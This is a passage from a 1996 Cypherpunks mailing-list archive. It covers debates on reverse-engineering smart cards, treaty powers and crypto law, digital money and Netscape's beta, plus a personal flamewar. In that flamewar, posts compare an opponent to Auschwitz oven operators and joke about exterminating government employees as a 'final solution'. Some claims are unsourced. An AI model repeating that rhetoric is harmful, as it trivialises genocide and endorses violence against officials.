of permitting such observation in a laboratory environment.

Such distractions, unfortunately, are why good physics rarely
gets discussed in sci.physics, and why discussions on this list
about nuclear bomb design, tampering, and hacking frequently take
off in the crackpot direction.

The bad eventually drives out the good, and few of the competent
posters are going to continue to comment on a thread which has
degenerated into the "You don't know anything.  Mr. Squid can
read your smart card and your brain waves too" level of
interaction.

Somewhere amongst all the noise here was the interesting
disclosure that DSS had been compromised, and the beginnings of a
good discussion about current "scrambling" protocols and their
vulnerabilities.  Let's see if we can recapture that discussion,
and let the rants about obscure technologies magickally defeating
all conceivable forms of tamper-resistant packaging drop.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 1 Apr 1996 10:18:59 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <Pine.SUN.3.91.960331160407.18816E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


> On Sat, 30 Mar 1996, Dr. Dimitri Vulis wrote:
>
> > Black Unicorn <unicorn@schloss.li> writes:
> >
> > > On Fri, 29 Mar 1996, jim bell wrote:
> > > >
> > > > >Anyone who knows me knows I spend all my days end arounding the
> > > > >U.S. government.
> > > >
> > > > Explains a lot!   You _are_ paid for this.  In an earlier era, you
> > > > would have gladly run the ovens at Auschwitz if you'd gotten paid 
> > > > for it. would have gladly run the ovens at Auschwitz if you'd 
> > > > gotten paid for it. 
> > >
> > > You're way out of line here.
> > > I expect an apology.
> >
> > Consider the above in context. Would you be willing to run the ovens/gas
> > chambers if you were exterminating U.S. government employees/contractors?
>
> No, I would not.  That's the difference between me and you- er... Mr. Bell.

. Finally, Lance blew his nym.

I'd love to hear the rationale behind this.

. So, do you think that I'm Jim Bell's tentacle or that he's my tentacle?

Does it make a difference?

> > "The final solution to the IRS/BATF problem." :-)

. And what if you were "processing" U.S. Congressmen?

I find this entire line of conversation revolting.  I also don't find it 
very surprising given the sources/source.

. ---
. Dr. Dimitri Vulis
. Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Zambini <jlasser@rwd.goucher.edu>
Date: Mon, 1 Apr 1996 11:37:13 +0800
To: JonWienke@aol.com
Subject: Witch Hunts
In-Reply-To: <960331120551_366431213@emout06.mail.aol.com>
Message-ID: <Pine.SUN.3.91.960331160359.9821B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 31 Mar 1996 JonWienke@aol.com wrote:

> >My preferred and soon to be permanent e-mail address:unicorn@schloss.li
> >"In fact, had Unicorn not existed,       potestas scientiae in usu est
> >Detweiler might not have had to invent him."    in nihilum nil posse reverti
> >00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
> 
> Unicorn = Detweiler = Agent Provocateur

Well, I won't say it's impossible.

However, for those of you who are relatively new to the list, Mr. Unicorn 
has been a regular (and useful) contributor to the list. My belief in 
this has been unwavering. Excepting, of course, the recent Unicorn/Bell 
flamefest, which we all get sucked into occasionally.

My opinion of Mr. Bell on the same issue has varied widely; however, he 
has participated (in recent times) in more flamewars on the list than 
anyone, including the usual flamers (ie Perry, me, etc.).

It is also interesting to note that Mr. Unicorn talks knowledgably about 
several fields; Mr. Bell talks about one field, and there are those who 
would dispute his knowledge about it.

I have had an e-mail correspondence with Mr. Bell that lasted several 
messages. In it, we were both civil and friendly; I post this now not to 
take sides in the flamewar, but merely to note that, in my opinion, it is 
improbable that Black Unicorn is Detweiller, and that, although I missed 
the origin of this thread, it is likely a suggestion from Mr. Bell or one 
of his associates, intended to discredit him.

If Mr. Unicorn is indeed Detweiller, it is in the mold of Vlad Z. Nuri, 
who (while almost certainly Detweiller) has produced useful contributions 
on the list, while refraining from acting out.

It is also worth noting that the original Detweiller, in a sense, played 
De Sade to Tim May's Rousseau, in that he used an unorthodox, but 
effective, critical technique. (This is, in fact, one reading of De 
Sade's "pornography" -- an interesting counterexample to what was 
trumpeted on _Both_ sides of the recent Firing Line debate: that 
pornography or obscenity is, whether or not protected, devoid of any 
intellectual content.)

Jon Lasser (his own tentacle :-) )
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 1 Apr 1996 10:21:00 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
In-Reply-To: <199603311936.LAA18229@netcom15.netcom.com>
Message-ID: <199603312135.QAA20370@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> We aren't talking about IC masks here.  We are talking about
> electrostatic charges which would instantly leak away if the
> insulation around them were in the least bit compromised.

I was under the impression charges had associated fields which could
be detected without physically touching the charged object. Silly me.

Incidently, EEPROMs don't work by simply charging a capacitor or
something silly like that. No insulator is perfect, no dielectric is
perfect, and charge would eventually leak away were that the
case. However, if it were, it would be fairly easy to determine the
state of a cell without having to get particularly close to it. Beyond
that, there is this insane notion you seem to have that a charged
object will lose its charge if the "insulator" is "stripped off" -- I
wasn't under the impression a vacuum, for instance, was a particularly
good charge carrier.

> Such data wouldn't even survive the preparation for scanning
> microscopy, much less the actual inspection process.

I believe you are operating on some sort of weird faith here rather
than in reality. Reality is that even the extraordinarily well built
circuits on the Capstone and similar chips that the NSA is trusting
the Skipjack algorithm to aren't believed to be uncompromisable -- I
believe the words were something to the effect of "it would take
the resources of a national laboratory to reverse engineer" or some
such.

In any case, I don't care to debate this further. I am coming to
believe very strongly that you just don't know what you are talking about.

>  > They aren't immune to the laws of physics. If it can be put
>  > together, it can be taken apart. I can even surmise HOW it
>  > can be taken apart.
> 
> If you put something fragile inside a container which cannot be
> breached without exposing the fragile thing to a destructive
> environment, then the fragile thing is very unlikely to be
> retrieved intact.

If a container contains some protective gas, you can pressurize the
exterior with the same at the same pressure. If the container contains
a vacuum, you can open the container in a vacuum. If the contents are
light sensitive, you can open the container in the dark.

This is a problem like copy protection. Yes, you can make things
arbitrarily hard, but you can't make them hard enough.

>  > The Americans trust their money to the notion that no
>  > counterfeiter can afford to pay a million or so for an
>  > intaglio press.
> 
> It is neither likely nor relevant.

No, its relevant. You cut out what I quoted, which was you saying "the
europeans trust smartcards for storing money", to which I noted,
basically, "so what; people trust even more easily forged things like
paper, with nothing standing between a forgery and the forger than
some special paper and an intaglio press." You brought it up, not me.

> An endless metaphysical quibble over whether God can create a
> smart card he can't peek into does not serve to further
> illuminate the cryptographic issues under discussion.

The point is that men can't create an impenetrable smart card.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 1 Apr 1996 15:07:12 +0800
To: cypherpunks@toad.com
Subject: Re: Electronic locksmiths are watching you (Belgium's ban onPGP)
Message-ID: <m0u3YEC-0008x8C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:22 AM 3/31/96 -0500, Jean-Francois Avon (JFA Technologies, QC, Canada) wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Dave Del Torto <ddt@lsd.com> wrote:
>
>>At 1:25 am 3/30/96, jim bell wrote:
>>>We should be particularly suspicious of any hint of a pan-European ban or
>>>control of encryption, because that is exactly the kind of development that
>>>could usher in a secretly-negotiated treaty that might be argued to be
>>>binding on the public.               [elided]
>
>>Cypherpunks like Jim need to keep doing their homework before they make
>>such quasi-factual statements.
>
>
>Jim seems to analyse a situation in terms of broad principles, 
>while Dave seems to focus more on specifics that would disprove Jim.
>
>I agree with the Dave's last phrase in the sense that our models of reality
>should indeed be rooted in reality.

I hope by now you've seen my reply about the treaty issue.  I wasn't 
particularly focussing on the question of what Europe will do qua Europe, 
but how the treaty issue could be abused in the US.  Here is the section of 
the US Constitution which is relevant, and which I mentioned  by reference before:

Article VI
...

This Constitution, and the Laws of the United States which shall be made in 
Pursuance thereof; and all Treaties made, or which shall be made, under the 
Authority of the United States, shall be the supreme Law of the land; and 
the Judges in every State shall be bound thereby, any Thing in the 
Constituion or Laws of any State to the Contrary notwithstanding.
...


I do not believe that this section was intended to mean that the _citizens_ 
of the US are bound by treaty obligations; That would be illogical, treaties 
are agreements between governments. Treaties are inherently intended to 
govern relations with foreign countries, not legal or political 
circumstances within a particular country.  Treaties may AFFECT citizens, 
such as extradition treaties, immigration/emigration treaties, and passport 
requirements, but the citizen doesn't "agree" with them. 

That's evidenced by the fact that treaties are ratified by only the US 
Senate, the body with two Senators from each state.  (The House has 
proportional representation, based on the population of each state.)  The 
intent, I suggest, was that treaties were supposed to be interpreted as 
applying to the country, while laws applied to the individual.

(Since you're Canadian, and for other non-US readers, I should point out 
that when the US Constitution was being drafted and debated, citizens were 
strongly loyal to their state, not the country as a whole, and there was a 
debate concerning how the representation in the Federal legislature should 
be divvied up.  Obviously, large states wanted proportional representation, 
small states wanted "n-votes-per-state."  The compromise was to have two 
houses, one of each kind of system. (House=proportional, Senate=2 votes per state.))  
Laws have to be passed by both houses to become valid; treaties, on the other hand, 
only need to be ratified by the Senate.  

In any case, since laws can be declared unconstitutional I think it's 
implicit that there can be such a thing as an "unconstitutional treaty," or 
at least one if declared to be binding on the citizens would be in violation 
of the Constitution.  If, for example, the US government decided that it 
wanted to take away free speech rights from its citizens, to name an 
obviously fantastic example, it could arguably write a treaty with, say, 
Mexico, "agreeing" that free-speech rights will not apply to the citizens of 
each country.  

While in practice such an extreme example would never fly and would not be 
tested (fortunately!) I have read that this section is opportunistically 
interpreted as if a treaty can be assumed to bind the citizens and not 
merely the government.  I believe there was a treaty in the middle 1960's called 
something like "Single Issue Treaty on Narcotics" which led directly to a 
massive re-write of the drug laws in the US.  In view of the fact that 
today, probably 70% of the inmates in US prisons are there on drug charges, 
it is obvious that this treaty had a long-lasting internal effect, far 
beyond what a person might have expected at the time.

Whether or not this interpretation could still work in today's changed 
political climate, I don't know, but it's obvious that portions of the US 
government would dearly love to control encryption in particular and 
communications in general.  Since telecommunications is one of those 
subjects that is covered by past treaties, and can be expected to be covered 
by future ones, I believe that American citizens need to be particularly 
concerned about the government sneaking in laws in the "back door," made by 
treaty, as opposed to the "front door", made by both the House and Senate 
and subject to Presidential veto.  (Not that I have much respect for the 
latter, either, but that system is a bit easier to control.)

If anything, I think there needs to be an explicit prohibition written into 
law prohibiting the enforcement of anti-crypto treaty terms on the citizens, 
or even better a law requiring that all future telecommunications treaties 
to which the US is a party not contain any regulations or restrictions on 
crypto.  But I'm not hopeful about this.

>But considering that in most european country, you are recognized guilty 
>unless proven innocent, it is only non-contradictory to arrive at Jim's
>conclusions.  The basic psycho-epistemology at work there is implying that.

There is probably much about Europe which is superior to the US, but they do 
have a problem with social and political stratification given their long history.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Mon, 1 Apr 1996 15:58:22 +0800
To: cypherpunks@toad.com
Subject: Key signing - LA & SF
Message-ID: <199604010026.RAA00174@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I will be in the Los Angeles and San Francisco areas briefly at the end of
April. Anyone who would like to trade keysignatures, please email me. 
(Unfortunately my ability to get around will be somewhat limited)

Don

ObCypherpunks: I read cpunks by NNTP from nntp.hks.net. Let me assure you, the
apparent noise level has gone down by 90% from when it landed in my mailbox.
Many thanks to those who provide this service.
- -- 
<don@cs.byu.edu> http://students.cs.byu.edu/~don  PGP 0x994B8F39  fRee cRyPTo!
  "It is not worth an intelligent man's time to be in the majority.  By 
  definition, there are already enough people to do that." - G. H. Hardy
** This user insured by the Smith, Wesson, & Zimmermann insurance company **

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMV8iosLa+QKZS485AQGVJgL/TED+T/49jMtNRbCAHJdo+IkSOTx7Ajrx
Ox7+ABlcbCYKudLE70qh7RDdz9TI2sojB6FZ0vyoLGdVM61ljfd9YzZfq/kVXsyY
EZ4HM2nGInXBQFo+rfQcn7JbXAT3agz/
=NZjK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 1 Apr 1996 15:42:20 +0800
To: cypherpunks@toad.com
Subject: Re: SQUID's (fwd)
Message-ID: <199603312348.RAA00351@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> 
>  > Apparently you are grossly unfamiliar with the
>  > characteristics and capabilities of SQUID's. To help you
>  > catch up...
> 
> Actually, I am quite familiar with Superconducting Quantum
> Interference Devices and the one existing commercial application
> of the technology, a magnetometer probe containing a liquid
> nitrogen cooled SQUID chip at its tip.

There are several commercial probes available, not a single source as you
claim. The Air Force has used them in experimental fighter programs for
several years allowing hands-off flying (in a simulator) with quite good
results. Quite a few neurophysiologists use them along with NMR to map the
neuronal activity of the human brain on a neuron by neuron basis. The folks
who make the various flavors of super-conducting wire use them to test for
imperfections in the product. I sugest that your familiarity with the SQUID
technology might be a little dated. Take the time to contact Conductus.

> 
> [Biography of Mr. Squid deleted]
> 
> I will still laugh at suggestions that Mr. Squid can remotely
> read the EEPROM in my smart card, however.

I didn't make that assertion. I clearly offered it as a source of education
and entertainment. I even went so far as to specificaly predicate my recital
with this caveat.

While Mr. SQUID might be able to do it, the other commercial probes out
there would have no problem from reading your smart card on a transistor by
transistor state if that is what were required.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Mon, 1 Apr 1996 02:24:11 +0800
To: cypherpunks@toad.com
Subject: Netscape Navigator 3.0 beta
Message-ID: <Pine.SOL.3.91.960331175255.2745B-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain



I found today Netscape Navigator 3.0 AKA Netscape Navigator Atlas 
available for download from Netscape. Things of interest for this list 
are client or personal certificates, have a look at Options->Security. I 
do not have a WWW server with client certificate support right now, so I 
can't tell if it is actually implemented in the beta.

Jüri Kaljundi
jk@digit.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 1 Apr 1996 16:05:38 +0800
To: Jonathon Blake <grafolog@netcom.com>
Subject: Re: Blue Water spooks
In-Reply-To: <Pine.3.89.9603302337.A27535-0100000@netcom15>
Message-ID: <Pine.SUN.3.91.960331184105.18816I-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Mar 1996, Jonathon Blake wrote:

> 	Alan:
> 
> On Sat, 30 Mar 1996, Alan Horowitz wrote:
> 
> > metaphor} spook services) could do better than the Japanese did in 
> > sigint'ing against human speakers of Navajoe?
> 
> 	Have the Chinese turned their thought towards cryptography,
> 	or cryptanalysis yet?   If so, I suspect the answer is 
> 	yes,  If not, then the answer is a definate No.
> 
> 	The Chinese Intelligence Service traditionally has 
> 	not looked outward, preferring to ply its trade domestically.
> 	That said, the earliest extant text on espionage is Chinese. 

This is not strictly true.

The Chinese are widely reputed to have penetrated both Japanese and 
Russian services quite completely.  Their industrial espionage has been far 
reaching (United States, U.K., Germany) and their political disruptive and 
fund raising activites have included fully funding arms dealers in 
California and all over the western United States.

In the mid 80s several "former" Chinese intelligence officers appeared 
in California and opened gun shops.  Their prices on Chinese made weapons 
were so low that compeditors couldn't figure out how it was done.  
Finally someone did some poking around and found that the Chinese 
government was literally giving the weapons to the agents, allowing them 
to keep something like 80% of the profits.  Really quite a clever (and 
typically communist) scheme.

"The capitalist pigs will destroy themselves with our guns and pay us 
for the favor.  Muahahah!"

20/20 and Frontline both did pieces on the operation.

Bottom line:  The Chinese have often extended their intelligence 
operations beyond their borders, even boldly.

>         xan
> 
>         jonathon
>         grafolog@netcom.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Mon, 1 Apr 1996 13:03:07 +0800
To: Jyri Kaljundi <cypherpunks@toad.com
Subject: Re: Netscape Navigator 3.0 beta
Message-ID: <9603312351.AA08987@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Found an interesting article on Ecash in Industrial (Internatioal) Design.

/ What is Money /
Karrie Jacobs
ID March/April 96



_______________________
Regards,            Those who would have nothing to do with thorns must 
                    never attempt to gather flowers.
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Randy Catoe <Randy@mci.net>
Date: Mon, 1 Apr 1996 13:12:33 +0800
To: perry@piermont.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
Message-ID: <01I2ZZ718SXE001O2D@ALPHA1.RESTON.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain



>"Perry E. Metzger" <perry@piermont.com> writes:
>
> > Or to people with access to scanning microscopy techniques
> > like STMs or AFMs. I suspect that there are lots of
> > techniques that can be successfully used. It used to be that
> > using them required the sort of facilities only available at
> > a large semiconductor manufacturer, but now I suspect that
> > it would be easy for a student at a major university, and
> > probably less easy, but still perfectly feasible, for a
> > person working at home with lots of sophisticated but fairly
> > available equipment like STMs.
>
The proof would be in the pudding, would it not? Are their 
documented cases of smartcard scavenging? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 1 Apr 1996 16:07:08 +0800
To: Randy Catoe <Randy@mci.net>
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
In-Reply-To: <01I2ZZ718SXE001O2D@ALPHA1.RESTON.MCI.NET>
Message-ID: <199604010012.TAA20951@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Randy Catoe writes:
> The proof would be in the pudding, would it not? Are their 
> documented cases of smartcard scavenging? 

There are documented cases of similar reverse engineering. I don't
know of any specific cases of smartcard scavenging but its all
essentially the same tools.

Whether it is financially worthwhile to do this is another story.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 1 Apr 1996 20:13:49 +0800
To: Bruce Zambini <JonWienke@aol.com
Subject: Re: Witch Hunts
Message-ID: <m0u3aPB-0008xCC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:15 PM 3/31/96 -0500, Bruce Zambini wrote:
>On Sun, 31 Mar 1996 JonWienke@aol.com wrote:
>
>> >My preferred and soon to be permanent e-mail address:unicorn@schloss.li
>> >"In fact, had Unicorn not existed,       potestas scientiae in usu est
>> >Detweiler might not have had to invent him."    in nihilum nil posse reverti
>> >00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
>> 
>> Unicorn = Detweiler = Agent Provocateur
>
>Well, I won't say it's impossible.
>
>However, for those of you who are relatively new to the list, Mr. Unicorn 
>has been a regular (and useful) contributor to the list. My belief in 
>this has been unwavering. Excepting, of course, the recent Unicorn/Bell 
>flamefest, which we all get sucked into occasionally.

The fact that you are willing to include the name "Unicorn" in that 
"flamefest" should hold a clue as to the source of the problem.

>My opinion of Mr. Bell on the same issue has varied widely; however, he 
>has participated (in recent times) in more flamewars on the list than 
>anyone, including the usual flamers (ie Perry, me, etc.).

I do, however, promote one of the most controversial ideas you've probably 
ever seen discussed on the computer networks.  You might well imagine that 
doing so would tend to attract people who are like moths attracted to a 
flame.  Thus, a "flamewar."  Notice that Unicorn tries to flame me on 
practically every subject he can, which should be another clue as to his 
motivations.

If you've ever had a controversial work published in a mass-media outlet 
(and the Internet is turning into just such a thing) you'll notice that 
you'll get unsolicited letters from people, some of whom aren't quite "all 
there", and  people who obviously have their own ax to grind.  Often both. 
(I had a guest editorial published in the Portland Oregonian newspaper about 
six years ago, so I speak from experience.)  Usually that ends quickly; 
people have short memories and are distracted by newer events.  In the 
computer network area, however, the opportunity for follow-ups is ever-present.

That's why I'm not surprised about people like Unicorn.  It would probably 
be excessive to say "he's crazed," but he clearly spends an unusual amount 
of effort.  Check out the CP archives a few days ago; I did an experiment, 
choosing to not to respond to nearly all of his notes.  He kept writing!

>It is also interesting to note that Mr. Unicorn talks knowledgably about 
>several fields; Mr. Bell talks about one field, and there are those who 
>would dispute his knowledge about it.

Quite the contrary:  While my degree is in Chemistry, most particularly 
Organic Chemistry (but also Physical chemistry, solid-state chemistry, and 
inorganic chemistry), I am rather knowledgeable about physics (including 
nuclear, high-energy, semiconductor, astrophysics, etc), electronics (analog and digital; 
I was frequently mistaken for a EE student during my college years), optics, 
computer hardware, a smattering of computer software, radio (I'm a ham) and 
a few other fields. 

This, however, is the "Cypherpunks" area, and with the exception of some 
bomb-trigger discussions a few weeks ago, much of that knowledge isn't 
commonly shown in the majority of the discussions here.  It's odd, 
therefore, that you would suggest that I "talk about one field," as if that 
was somehow my limit.  If anything, it shows that I (at least in your eyes) 
pay more attention to the subject of the list than Unicorn.

If you really want to start talking about some of these other fields, I'd be 
happy to, but I don't think that would improve  the specificity of the list. 
Other people might object, as well.  We go on enough tangents as it is.


>I have had an e-mail correspondence with Mr. Bell that lasted several 
>messages. In it, we were both civil and friendly; I post this now not to 
>take sides in the flamewar, but merely to note that, in my opinion, it is 
>improbable that Black Unicorn is Detweiller, and that, although I missed 
>the origin of this thread, it is likely a suggestion from Mr. Bell or one 
>of his associates, intended to discredit him.

This sounds like a conspiracy theory.  I don't have any "associates."  And I 
have never posted on any list, echo, USENET group, or bbs under an alias, 
and I am posting with my real name.  I'm listed in the phone directory for Vancouver, 
Washington, and I've never had an unlisted telephone number.

Until Unicorn is willing to identify himself with the same amount of 
verifiable detail, it is in his direction you should look for conspiracies.

>If Mr. Unicorn is indeed Detweiller, it is in the mold of Vlad Z. Nuri, 
>who (while almost certainly Detweiller) has produced useful contributions 
>on the list, while refraining from acting out.

What, exactly, is your definition of a "useful contribution"?

>It is also worth noting that the original Detweiller, in a sense, played 
>De Sade to Tim May's Rousseau, in that he used an unorthodox, but 
>effective, critical technique. (This is, in fact, one reading of De 
>Sade's "pornography" -- an interesting counterexample to what was 
>trumpeted on _Both_ sides of the recent Firing Line debate: that 
>pornography or obscenity is, whether or not protected, devoid of any 
>intellectual content.)

Somebody ( I don't recall who) once opined to me that Unicorn behaves toward 
me somewhat like Detweiler behaved towards Tim May.  I probably missed most 
of that, but I can see the similaries.  This doesn't make him Detweiler, but 
it suggests that his motivations are similar.


One last thing:  On re-reading your note, I noticed that your writing style 
is rather... how shall I say... familiar.  Care to discuss how you did it?  
Did you use a program?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 1 Apr 1996 16:07:58 +0800
To: Jim Choate <cypherpunks@toad.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks (fwd)
Message-ID: <ad847bd503021004c3f2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:54 PM 3/31/96, Jim Choate wrote:
>Forwarded message:
>
>> > Presumedly the state of the EEPROM cannot be deduced by any
>> > external examination of the card, and any attempt to
>> > incrementally abrade the card down to the relevent circuit
>> > elements should completely obliterate the minute charge
>> > differences which represent the data.
>>
>> They aren't immune to the laws of physics. If it can be put together,
>> it can be taken apart. I can even surmise HOW it can be taken apart.
>
>You wouldn't even have to take it apart. Just subject it to analysis using
>SQUID's. Using this technology you would not even have to physicaly touch
>the card, let alone remove any parts of it.

Well, I worked on SQUIDs (Superconducting quantum-interferometric devices)
in 1972-3, and also worked on electron-beam analysis of microprocessors and
memory device in 1980-84, and I can assure you that SQUIDs cannot do what
you want them to do.

I'll be happy to supply additional details if there's sufficient interest.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Mon, 1 Apr 1996 17:25:15 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <9604010051.AA13126@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>Mark Neely - accessnt@ozemail.com.au  said:

>Well, doesn't this beg the question - the "desire" by people to own them
>is not as a result of advertising, but the fact that society has long 
>fixed them as standard units of "currency".
>
>If all those centuries ago marble was decided upon as a central 
>unit of currency, we'd all be killing ourselves to get some, not because
>of any aestetic beauty.

I do not think so.  The common never holds value because value, especially
in a crude civilisation, is related to rarity or difficulty to produce and 
obtain.  AFAIK, gold was considered a value in every civilisation.  If some
did not consider it a value, then, they either ignored it's existence or had
so much that it was not a value.  Marbles are easy to make in most 
civilisations.  They therefore cannot be used as a value standard.

One problem with e-$, as pointed out by many, is that it has to have a 
*perceivable* value.  Backing it by something physical that is already valued
might be the best way to launch it.  Otherwise, it will have the statute, if
not
legally, at least in the mind of the average Joe, the same as junks bonds.

JFA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMV7fLMiycyXFit0NAQEGfAf8C3/kwoJ4Fnk7W7UP0P92+TGtgn3HAf/q
AJ9V13iZVuX9hI96lP9PPixWryz0olI6D2df6c509peCoND4JUUXj2eBhJ0U/tHz
3Xw2D2oCep0fgm8NC6TzBBobrzcTExM41N5BG8H76SAJk9bz9zoHRx5OH2HVNCvu
WyRXA0g2C9N6v0FpmQaQ2C0ose5c/WVQ9Yk/JmMgc0kw0HaT6VVVDfAkz+jTjCbj
+0fh3gLREUdkx3pHXQ6ulfrZ4VoSz1qHSXCVKLy5kODieIYAMkZ0k/aYnbxPZRyX
oHmk5kIKP9dO5Ao064ViJACi8gAYlwFp7YOSCexpJRDz0b7UMtO9/g==
=a251
-----END PGP SIGNATURE-----

 PGP key at:               http://w3.citenet.net/users/jf_avon
 Jean-Francois Avon <jf_avon@citenet.net> ID:C58ADD0D 96/03/01    
 fingerprint: 52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 

 Unsollicited commercial e-mail will be proofread at a rate of 
 165 $ U.S. per hours.   Any sender of unsollicited commercial 
 e-mail will be considered as to have accepted the above ment-
 ionned terms.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 1 Apr 1996 19:48:38 +0800
To: perry@piermont.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
Message-ID: <ad847d2604021004131b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:36 PM 3/31/96, Mike Duvos wrote:

>We aren't talking about IC masks here.  We are talking about
>electrostatic charges which would instantly leak away if the
>insulation around them were in the least bit compromised.

The surface layers above the active portion of a chip can be stripped away
and chip remains functional. This includes the outer packaging layers
(epoxy, or of course, ceramic with metal lids) and parts of the so-called
"scratch protection," usually a type of silicate glass.

The active capacitors are not affected by removal of these layers.

>Such data wouldn't even survive the preparation for scanning
>microscopy, much less the actual inspection process.

Actually, we did it all the time in my lab at Intel, and I understand from
my former co-workers that the technology has only gotten better. (This does
not mean voltage contrast is easy. For one thing, modern chips have 3-5
metal layers, due to spectacular advances in chem-mechanical polishing, and
each metal layer acts as a ground plane shielding the lower layers from
visibility and inspection with electron beams. And EPROM and EEPROM cells
are effectively impossible to analyze, for various reasons.)

This does not mean I think reverse-engineering of smart cards or satellite
boxes is easy.

SQUIDs won't do it, either.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Mon, 1 Apr 1996 06:23:17 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD UpDate
Message-ID: <960331195402.204003bd@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


>If pieces of the source/executable are digitally signed, you have a basis
>for some degree of trust.  (My pgp came with a detached signature.  A bit
>self-referental, but at least a start.)
>
>Regards - Bill

	Agreed, but it imposes further restrictions: it's OK if you
can put PGP digitally signed by prz, but not all packages will be
